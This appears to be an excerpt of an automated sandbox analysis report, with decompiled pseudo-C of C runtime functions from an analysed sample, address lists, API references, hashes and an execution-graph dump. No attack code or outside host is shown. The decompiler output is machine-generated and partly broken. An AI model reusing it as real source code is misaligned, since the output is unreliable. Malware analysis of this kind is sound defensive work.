                                                • Instruction Fuzzy Hash: D0210175200215AFDB20AFA6CC81DEBBBEDFF253607208568F829D7641D730ED018BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001B319D(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                				void* _t15;
                                                				void* _t16;
                                                				intOrPtr _t18;
                                                				intOrPtr _t38;
                                                				intOrPtr* _t40;
                                                				intOrPtr _t41;
                                                
                                                				_t40 = _a4;
                                                				if(_t40 != 0) {
                                                					if( *_t40 != 0) {
                                                						_t15 = E001BDD41(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
                                                						if(_t15 != 0) {
                                                							_t38 = _a8;
                                                							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
                                                								L10:
                                                								_t16 = E001B327C(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
                                                								if(_t16 != 0) {
                                                									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
                                                									_t18 = 0;
                                                								} else {
                                                									E001AFEE7(GetLastError());
                                                									_t18 =  *((intOrPtr*)(E001AFF41()));
                                                								}
                                                								L13:
                                                								L14:
                                                								return _t18;
                                                							}
                                                							_t18 = E001B32BA(_t38, _t15);
                                                							if(_t18 != 0) {
                                                								goto L13;
                                                							}
                                                							goto L10;
                                                						}
                                                						E001AFEE7(GetLastError());
                                                						_t18 =  *((intOrPtr*)(E001AFF41()));
                                                						goto L14;
                                                					}
                                                					_t41 = _a8;
                                                					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
                                                						L5:
                                                						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
                                                						_t18 = 0;
                                                						 *((intOrPtr*)(_t41 + 0x10)) = 0;
                                                						goto L14;
                                                					}
                                                					_t18 = E001B32BA(_t41, 1);
                                                					if(_t18 != 0) {
                                                						goto L14;
                                                					}
                                                					goto L5;
                                                				}
                                                				E001B333F(_a8);
                                                				return 0;
                                                			}









                                                0x001b31a3
                                                0x001b31a8
                                                0x001b31bf
                                                0x001b31f1
                                                0x001b31fb
                                                0x001b3214
                                                0x001b321a
                                                0x001b3228
                                                0x001b3235
                                                0x001b323c
                                                0x001b3255
                                                0x001b3258
                                                0x001b323e
                                                0x001b3245
                                                0x001b3250
                                                0x001b3250
                                                0x001b325a
                                                0x001b325b
                                                0x00000000
                                                0x001b325b
                                                0x001b321f
                                                0x001b3226
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b3226
                                                0x001b3204
                                                0x001b320f
                                                0x00000000
                                                0x001b320f
                                                0x001b31c1
                                                0x001b31c7
                                                0x001b31da
                                                0x001b31dd
                                                0x001b31df
                                                0x001b31e1
                                                0x00000000
                                                0x001b31e1
                                                0x001b31cd
                                                0x001b31d4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b31d4
                                                0x001b31ad
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37c684e746d6b62813328a010bb324b0bc1e187b9773c288d031a1958ca1d08a
                                                • Instruction ID: d63a57c7163293e42f86d55fe28e74275efdbbe79c9578f35c620c4a936560be
                                                • Opcode Fuzzy Hash: 37c684e746d6b62813328a010bb324b0bc1e187b9773c288d031a1958ca1d08a
                                                • Instruction Fuzzy Hash: 5521F331200205AFDB10AFA1DC419AB77ADFF653607114569F936C7191EB30EF208BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001C570F(void* _a4, long _a8, DWORD* _a12) {
                                                				void* _t13;
                                                
                                                				_t13 = WriteConsoleW( *0x1d5a50, _a4, _a8, _a12, 0);
                                                				if(_t13 == 0 && GetLastError() == 6) {
                                                					E001C56F8();
                                                					E001C56BA();
                                                					_t13 = WriteConsoleW( *0x1d5a50, _a4, _a8, _a12, _t13);
                                                				}
                                                				return _t13;
                                                			}




                                                0x001c572c
                                                0x001c5730
                                                0x001c573d
                                                0x001c5742
                                                0x001c575d
                                                0x001c575d
                                                0x001c5763

                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,001C3C69,00000000,00000001,00000000,00000000,?,001BA547,00000000,00000000,00000000), ref: 001C5726
                                                • GetLastError.KERNEL32(?,001C3C69,00000000,00000001,00000000,00000000,?,001BA547,00000000,00000000,00000000,00000000,00000000,?,001BAACE,00000000), ref: 001C5732
                                                  • Part of subcall function 001C56F8: CloseHandle.KERNEL32(FFFFFFFE,001C5742,?,001C3C69,00000000,00000001,00000000,00000000,?,001BA547,00000000,00000000,00000000,00000000,00000000), ref: 001C5708
                                                • ___initconout.LIBCMT ref: 001C5742
                                                  • Part of subcall function 001C56BA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001C56E9,001C3C56,00000000,?,001BA547,00000000,00000000,00000000,00000000), ref: 001C56CD
                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,001C3C69,00000000,00000001,00000000,00000000,?,001BA547,00000000,00000000,00000000,00000000), ref: 001C5757
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: 897209405173098d54a74272f9f54c5b86be3988de46ef6cfb2e23c7b7b142ab
                                                • Instruction ID: d635540873c404d64ae3c70e8be1cabb0fc80ae1a4268002a2d329fb3ec55cd1
                                                • Opcode Fuzzy Hash: 897209405173098d54a74272f9f54c5b86be3988de46ef6cfb2e23c7b7b142ab
                                                • Instruction Fuzzy Hash: E5F01C36401668BBCF222F95DC05F8A3F27FF193A1F804514FA1A86560D732D8A0EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 001B2C5D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: 15a36f7f79f878ea0e938f4f1552d5d71b469ea7d3ff318dd02138eee35a64f0
                                                • Instruction ID: f51f1c276a432a51d408947197677256fb736985489d2d02447f1a3bcd0891a7
                                                • Opcode Fuzzy Hash: 15a36f7f79f878ea0e938f4f1552d5d71b469ea7d3ff318dd02138eee35a64f0
                                                • Instruction Fuzzy Hash: DB516061A0820186CB1E7B14ED423FE3FA4EB50754F644D68F0D6862E9FF35CCD99A46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E001AC780(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v5;
                                                				signed int _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				char _v32;
                                                				char _t52;
                                                				signed int _t59;
                                                				intOrPtr _t60;
                                                				void* _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr _t64;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				intOrPtr _t72;
                                                				intOrPtr* _t76;
                                                				intOrPtr _t77;
                                                				signed int _t81;
                                                				char _t83;
                                                				intOrPtr _t86;
                                                				intOrPtr _t93;
                                                				intOrPtr _t96;
                                                				intOrPtr* _t98;
                                                				void* _t102;
                                                				void* _t104;
                                                				void* _t111;
                                                
                                                				_t89 = __edx;
                                                				_t76 = _a4;
                                                				_push(__edi);
                                                				_v5 = 0;
                                                				_v16 = 1;
                                                				 *_t76 = E001C66EB(__ecx,  *_t76);
                                                				_t77 = _a8;
                                                				_t6 = _t77 + 0x10; // 0x11
                                                				_t96 = _t6;
                                                				_push(_t96);
                                                				_v20 = _t96;
                                                				_v12 =  *(_t77 + 8) ^  *0x1d5010;
                                                				E001AC740(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x1d5010);
                                                				E001AD81C(_a12);
                                                				_t52 = _a4;
                                                				_t104 = _t102 - 0x1c + 0x10;
                                                				_t93 =  *((intOrPtr*)(_t77 + 0xc));
                                                				if(( *(_t52 + 4) & 0x00000066) != 0) {
                                                					__eflags = _t93 - 0xfffffffe;
                                                					if(_t93 != 0xfffffffe) {
                                                						_t89 = 0xfffffffe;
                                                						E001AD9A0(_t77, 0xfffffffe, _t96, 0x1d5010);
                                                						goto L13;
                                                					}
                                                					goto L14;
                                                				} else {
                                                					_v32 = _t52;
                                                					_v28 = _a12;
                                                					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
                                                					if(_t93 == 0xfffffffe) {
                                                						L14:
                                                						return _v16;
                                                					} else {
                                                						do {
                                                							_t81 = _v12;
                                                							_t59 = _t93 + (_t93 + 2) * 2;
                                                							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
                                                							_t60 = _t81 + _t59 * 4;
                                                							_t82 =  *((intOrPtr*)(_t60 + 4));
                                                							_v24 = _t60;
                                                							if( *((intOrPtr*)(_t60 + 4)) == 0) {
                                                								_t83 = _v5;
                                                								goto L7;
                                                							} else {
                                                								_t89 = _t96;
                                                								_t61 = E001AD940(_t82, _t96);
                                                								_t83 = 1;
                                                								_v5 = 1;
                                                								_t111 = _t61;
                                                								if(_t111 < 0) {
                                                									_v16 = 0;
                                                									L13:
                                                									_push(_t96);
                                                									E001AC740(_t77, _t89, _t93, _t96, _v12);
                                                									goto L14;
                                                								} else {
                                                									if(_t111 > 0) {
                                                										_t62 = _a4;
                                                										__eflags =  *_t62 - 0xe06d7363;
                                                										if( *_t62 == 0xe06d7363) {
                                                											__eflags =  *0x1c8228;
                                                											if(__eflags != 0) {
                                                												_t72 = E001C5FD0(__eflags, 0x1c8228);
                                                												_t104 = _t104 + 4;
                                                												__eflags = _t72;
                                                												if(_t72 != 0) {
                                                													_t98 =  *0x1c8228; // 0x1aad98
                                                													 *0x1c7144(_a4, 1);
                                                													 *_t98();
                                                													_t96 = _v20;
                                                													_t104 = _t104 + 8;
                                                												}
                                                												_t62 = _a4;
                                                											}
                                                										}
                                                										_t90 = _t62;
                                                										E001AD980(_t62, _a8, _t62);
                                                										_t64 = _a8;
                                                										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
                                                										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
                                                											_t90 = _t93;
                                                											E001AD9A0(_t64, _t93, _t96, 0x1d5010);
                                                											_t64 = _a8;
                                                										}
                                                										_push(_t96);
                                                										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
                                                										E001AC740(_t77, _t90, _t93, _t96, _v12);
                                                										_t86 =  *((intOrPtr*)(_v24 + 8));
                                                										E001AD960();
                                                										asm("int3");
                                                										_t66 = E001AD9B7();
                                                										__eflags = _t66;
                                                										if(_t66 != 0) {
                                                											_t67 = E001ACA43(_t86);
                                                											__eflags = _t67;
                                                											if(_t67 != 0) {
                                                												return 1;
                                                											} else {
                                                												E001AD9F3();
                                                												goto L24;
                                                											}
                                                										} else {
                                                											L24:
                                                											__eflags = 0;
                                                											return 0;
                                                										}
                                                									} else {
                                                										goto L7;
                                                									}
                                                								}
                                                							}
                                                							goto L28;
                                                							L7:
                                                							_t93 = _t77;
                                                						} while (_t77 != 0xfffffffe);
                                                						if(_t83 != 0) {
                                                							goto L13;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                				L28:
                                                			}






























                                                0x001ac780
                                                0x001ac787
                                                0x001ac78b
                                                0x001ac78c
                                                0x001ac792
                                                0x001ac79e
                                                0x001ac7a0
                                                0x001ac7a6
                                                0x001ac7a6
                                                0x001ac7af
                                                0x001ac7b1
                                                0x001ac7b4
                                                0x001ac7b7
                                                0x001ac7bf
                                                0x001ac7c4
                                                0x001ac7c7
                                                0x001ac7ca
                                                0x001ac7d1
                                                0x001ac82d
                                                0x001ac830
                                                0x001ac838
                                                0x001ac83f
                                                0x00000000
                                                0x001ac83f
                                                0x00000000
                                                0x001ac7d3
                                                0x001ac7d3
                                                0x001ac7d9
                                                0x001ac7df
                                                0x001ac7e5
                                                0x001ac850
                                                0x001ac859
                                                0x001ac7e7
                                                0x001ac7e7
                                                0x001ac7e7
                                                0x001ac7ed
                                                0x001ac7f0
                                                0x001ac7f3
                                                0x001ac7f6
                                                0x001ac7f9
                                                0x001ac7fe
                                                0x001ac814
                                                0x00000000
                                                0x001ac800
                                                0x001ac800
                                                0x001ac802
                                                0x001ac807
                                                0x001ac809
                                                0x001ac80c
                                                0x001ac80e
                                                0x001ac824
                                                0x001ac844
                                                0x001ac844
                                                0x001ac848
                                                0x00000000
                                                0x001ac810
                                                0x001ac810
                                                0x001ac85a
                                                0x001ac85d
                                                0x001ac863
                                                0x001ac865
                                                0x001ac86c
                                                0x001ac873
                                                0x001ac878
                                                0x001ac87b
                                                0x001ac87d
                                                0x001ac87f
                                                0x001ac88c
                                                0x001ac892
                                                0x001ac894
                                                0x001ac897
                                                0x001ac897
                                                0x001ac89a
                                                0x001ac89a
                                                0x001ac86c
                                                0x001ac8a0
                                                0x001ac8a2
                                                0x001ac8a7
                                                0x001ac8aa
                                                0x001ac8ad
                                                0x001ac8b5
                                                0x001ac8b9
                                                0x001ac8be
                                                0x001ac8be
                                                0x001ac8c1
                                                0x001ac8c5
                                                0x001ac8c8
                                                0x001ac8d5
                                                0x001ac8d8
                                                0x001ac8dd
                                                0x001ac8de
                                                0x001ac8e3
                                                0x001ac8e5
                                                0x001ac8ea
                                                0x001ac8ef
                                                0x001ac8f1
                                                0x001ac8fc
                                                0x001ac8f3
                                                0x001ac8f3
                                                0x00000000
                                                0x001ac8f3
                                                0x001ac8e7
                                                0x001ac8e7
                                                0x001ac8e7
                                                0x001ac8e9
                                                0x001ac8e9
                                                0x001ac812
                                                0x00000000
                                                0x001ac812
                                                0x001ac810
                                                0x001ac80e
                                                0x00000000
                                                0x001ac817
                                                0x001ac817
                                                0x001ac819
                                                0x001ac820
                                                0x00000000
                                                0x001ac822
                                                0x00000000
                                                0x001ac820
                                                0x001ac7e5
                                                0x00000000

                                                APIs
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 001AC7BF
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 001AC873
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 3480331319-1018135373
                                                • Opcode ID: 5edd1d2f4781d32f8fff7c0d378dff833fa0ab527d0d153da3dca76419f6f088
                                                • Instruction ID: c0676229a7d0baa496a5d64fb797ed9be0db2e85db89d97856de3024ca13e86f
                                                • Opcode Fuzzy Hash: 5edd1d2f4781d32f8fff7c0d378dff833fa0ab527d0d153da3dca76419f6f088
                                                • Instruction Fuzzy Hash: 8E41C238E002189FCF10DF68C884A9EBBB5BF56324F148159E819AB392D735EA45CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E001AD08D(signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				intOrPtr* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				signed int _v36;
                                                				void* _v40;
                                                				intOrPtr _v44;
                                                				signed int _v48;
                                                				intOrPtr _v56;
                                                				void _v60;
                                                				signed char* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t74;
                                                				void* _t75;
                                                				char _t76;
                                                				signed char _t78;
                                                				signed int _t80;
                                                				signed char* _t81;
                                                				signed int _t82;
                                                				signed int _t83;
                                                				intOrPtr* _t87;
                                                				void* _t90;
                                                				signed char* _t93;
                                                				intOrPtr* _t96;
                                                				signed char _t97;
                                                				intOrPtr _t98;
                                                				intOrPtr _t99;
                                                				void* _t100;
                                                				intOrPtr* _t101;
                                                				signed int _t102;
                                                				signed int _t103;
                                                				signed char _t108;
                                                				void* _t110;
                                                				signed char* _t111;
                                                				signed int _t112;
                                                				void* _t113;
                                                				signed char* _t116;
                                                				void* _t121;
                                                				signed int _t123;
                                                				void* _t130;
                                                				void* _t131;
                                                
                                                				_t96 = _a4;
                                                				if( *_t96 == 0x80000003) {
                                                					return _t74;
                                                				} else {
                                                					_t75 = E001AC96C(_t96, _t100, _t110, _t121, _t113, _t121);
                                                					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                                                						__imp__EncodePointer(0);
                                                						_t121 = _t75;
                                                						if( *((intOrPtr*)(E001AC96C(_t96, _t100, _t110, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                                                							_t87 = E001AA519(_t110, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                                                							_t130 = _t130 + 0x1c;
                                                							if(_t87 != 0) {
                                                								L16:
                                                								return _t87;
                                                							}
                                                						}
                                                					}
                                                					_t76 = _a20;
                                                					_v24 = _t76;
                                                					_v20 = 0;
                                                					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                                                						_push(_a28);
                                                						E001AA44C(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                                                						_t112 = _v36;
                                                						_t131 = _t130 + 0x18;
                                                						_t87 = _v40;
                                                						_v16 = _t87;
                                                						_v8 = _t112;
                                                						if(_t112 < _v28) {
                                                							_t102 = _t112 * 0x14;
                                                							_v12 = _t102;
                                                							do {
                                                								_t103 = 5;
                                                								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                                                								_t131 = _t131 + 0xc;
                                                								if(_v60 <= _t90 && _t90 <= _v56) {
                                                									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                                                									_t108 = _t93[4];
                                                									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                                                										if(( *_t93 & 0x00000040) == 0) {
                                                											_push(0);
                                                											_push(1);
                                                											E001ACC68(_t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                                                											_t112 = _v8;
                                                											_t131 = _t131 + 0x30;
                                                										}
                                                									}
                                                								}
                                                								_t112 = _t112 + 1;
                                                								_t87 = _v16;
                                                								_t102 = _v12 + 0x14;
                                                								_v8 = _t112;
                                                								_v12 = _t102;
                                                							} while (_t112 < _v28);
                                                						}
                                                						goto L16;
                                                					}
                                                					E001B2DB9(_t96, _t100, _t110, _t121);
                                                					asm("int3");
                                                					_t111 = _v68;
                                                					_push(_t96);
                                                					_push(_t121);
                                                					_push(0);
                                                					_t78 = _t111[4];
                                                					if(_t78 == 0) {
                                                						L41:
                                                						_t80 = 1;
                                                					} else {
                                                						_t101 = _t78 + 8;
                                                						if( *_t101 == 0) {
                                                							goto L41;
                                                						} else {
                                                							_t116 = _a4;
                                                							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                                                								_t97 = _t116[4];
                                                								_t123 = 0;
                                                								if(_t78 == _t97) {
                                                									L33:
                                                									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                                                										_t81 = _a8;
                                                										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                                                											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                                                												_t123 = 1;
                                                											}
                                                										}
                                                									}
                                                									_t80 = _t123;
                                                								} else {
                                                									_t82 = _t97 + 8;
                                                									while(1) {
                                                										_t98 =  *_t101;
                                                										if(_t98 !=  *_t82) {
                                                											break;
                                                										}
                                                										if(_t98 == 0) {
                                                											L29:
                                                											_t83 = _t123;
                                                										} else {
                                                											_t99 =  *((intOrPtr*)(_t101 + 1));
                                                											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                                                												break;
                                                											} else {
                                                												_t101 = _t101 + 2;
                                                												_t82 = _t82 + 2;
                                                												if(_t99 != 0) {
                                                													continue;
                                                												} else {
                                                													goto L29;
                                                												}
                                                											}
                                                										}
                                                										L31:
                                                										if(_t83 == 0) {
                                                											goto L33;
                                                										} else {
                                                											_t80 = 0;
                                                										}
                                                										goto L42;
                                                									}
                                                									asm("sbb eax, eax");
                                                									_t83 = _t82 | 0x00000001;
                                                									goto L31;
                                                								}
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                					}
                                                					L42:
                                                					return _t80;
                                                				}
                                                			}
















































                                                0x001ad094
                                                0x001ad09d
                                                0x001ad1bc
                                                0x001ad0a3
                                                0x001ad0a5
                                                0x001ad0af
                                                0x001ad0b2
                                                0x001ad0b8
                                                0x001ad0c2
                                                0x001ad0e7
                                                0x001ad0ec
                                                0x001ad0f1
                                                0x001ad1b8
                                                0x00000000
                                                0x001ad1b9
                                                0x001ad0f1
                                                0x001ad0c2
                                                0x001ad0f7
                                                0x001ad0fa
                                                0x001ad0fd
                                                0x001ad103
                                                0x001ad109
                                                0x001ad11b
                                                0x001ad120
                                                0x001ad123
                                                0x001ad126
                                                0x001ad129
                                                0x001ad12c
                                                0x001ad132
                                                0x001ad138
                                                0x001ad13b
                                                0x001ad13e
                                                0x001ad14d
                                                0x001ad14e
                                                0x001ad14e
                                                0x001ad153
                                                0x001ad166
                                                0x001ad168
                                                0x001ad16d
                                                0x001ad178
                                                0x001ad17a
                                                0x001ad17c
                                                0x001ad198
                                                0x001ad19d
                                                0x001ad1a0
                                                0x001ad1a0
                                                0x001ad178
                                                0x001ad16d
                                                0x001ad1a6
                                                0x001ad1a7
                                                0x001ad1aa
                                                0x001ad1ad
                                                0x001ad1b0
                                                0x001ad1b3
                                                0x001ad13e
                                                0x00000000
                                                0x001ad132
                                                0x001ad1bd
                                                0x001ad1c2
                                                0x001ad1c6
                                                0x001ad1c9
                                                0x001ad1ca
                                                0x001ad1cb
                                                0x001ad1cc
                                                0x001ad1d1
                                                0x001ad249
                                                0x001ad24b
                                                0x001ad1d3
                                                0x001ad1d3
                                                0x001ad1d9
                                                0x00000000
                                                0x001ad1db
                                                0x001ad1de
                                                0x001ad1e1
                                                0x001ad1e8
                                                0x001ad1eb
                                                0x001ad1ef
                                                0x001ad221
                                                0x001ad224
                                                0x001ad22b
                                                0x001ad231
                                                0x001ad23b
                                                0x001ad244
                                                0x001ad244
                                                0x001ad23b
                                                0x001ad231
                                                0x001ad245
                                                0x001ad1f1
                                                0x001ad1f1
                                                0x001ad1f4
                                                0x001ad1f4
                                                0x001ad1f8
                                                0x00000000
                                                0x00000000
                                                0x001ad1fc
                                                0x001ad210
                                                0x001ad210
                                                0x001ad1fe
                                                0x001ad1fe
                                                0x001ad204
                                                0x00000000
                                                0x001ad206
                                                0x001ad206
                                                0x001ad209
                                                0x001ad20e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ad20e
                                                0x001ad204
                                                0x001ad219
                                                0x001ad21b
                                                0x00000000
                                                0x001ad21d
                                                0x001ad21d
                                                0x001ad21d
                                                0x00000000
                                                0x001ad21b
                                                0x001ad214
                                                0x001ad216
                                                0x00000000
                                                0x001ad216
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ad1e1
                                                0x001ad1d9
                                                0x001ad24c
                                                0x001ad250
                                                0x001ad250

                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?), ref: 001AD0B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: c5b43ee78c9bbf15e806a1e039886add2b7acd0628658b527010e93b25584a6d
                                                • Instruction ID: 00bf4c1c4126c839b5f5d9568628e371cb8db88880ef871ec0b42b27822f57b8
                                                • Opcode Fuzzy Hash: c5b43ee78c9bbf15e806a1e039886add2b7acd0628658b527010e93b25584a6d
                                                • Instruction Fuzzy Hash: 2D419A76900209AFCF16DF98DD81AEEBBB5FF49304F188098F905B7221D3359950CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:15.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:52
                                                Total number of Limit Nodes:2
                                                execution_graph 27889 5a12832 27890 5a1283b 27889->27890 27891 5a127da 27889->27891 27892 5a127eb KiUserExceptionDispatcher 27891->27892 27893 5a12720 27891->27893 27947 5a13159 27948 5a13169 LdrInitializeThunk 27947->27948 27950 5a131a7 27948->27950 27907 5a1aac8 27908 5a1aae6 27907->27908 27911 5a19a6c 27908->27911 27910 5a1ab1d 27913 5a1c5e8 LoadLibraryA 27911->27913 27914 5a1c6c4 27913->27914 27915 2abc3c1 27916 2abc3d9 27915->27916 27920 2abe039 27915->27920 27925 2abe07f 27915->27925 27930 2abdae8 27915->27930 27921 2abe040 27920->27921 27935 2abec88 27921->27935 27939 2abec98 27921->27939 27922 2abe05a 27922->27916 27927 2abe041 27925->27927 27926 2abe05a 27926->27916 27927->27925 27927->27926 27928 2abec88 MonitorFromPoint 27927->27928 27929 2abec98 MonitorFromPoint 27927->27929 27928->27926 27929->27926 27931 2abe040 27930->27931 27933 2abec88 MonitorFromPoint 27931->27933 27934 2abec98 MonitorFromPoint 27931->27934 27932 2abe05a 27932->27916 27933->27932 27934->27932 27936 2abec98 27935->27936 27937 2abecf9 MonitorFromPoint 27936->27937 27938 2abed2a 27936->27938 27937->27938 27938->27922 27940 2abecdb 27939->27940 27941 2abecf9 MonitorFromPoint 27940->27941 27942 2abed2a 27940->27942 27941->27942 27942->27922 27894 2ab85e0 27895 2ab85f9 27894->27895 27896 2ab860e 27895->27896 27899 2ab9376 27895->27899 27903 2ab9364 27895->27903 27900 2ab9377 27899->27900 27901 2ab9380 KiUserExceptionDispatcher 27900->27901 27902 2ab9395 27900->27902 27901->27900 27902->27896 27904 2ab9377 27903->27904 27905 2ab9380 KiUserExceptionDispatcher 27904->27905 27906 2ab9395 27904->27906 27905->27904 27906->27896 27943 2ab9540 27944 2ab956c 27943->27944 27945 2ab95d0 LdrInitializeThunk 27944->27945 27946 2ab95e7 27945->27946

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
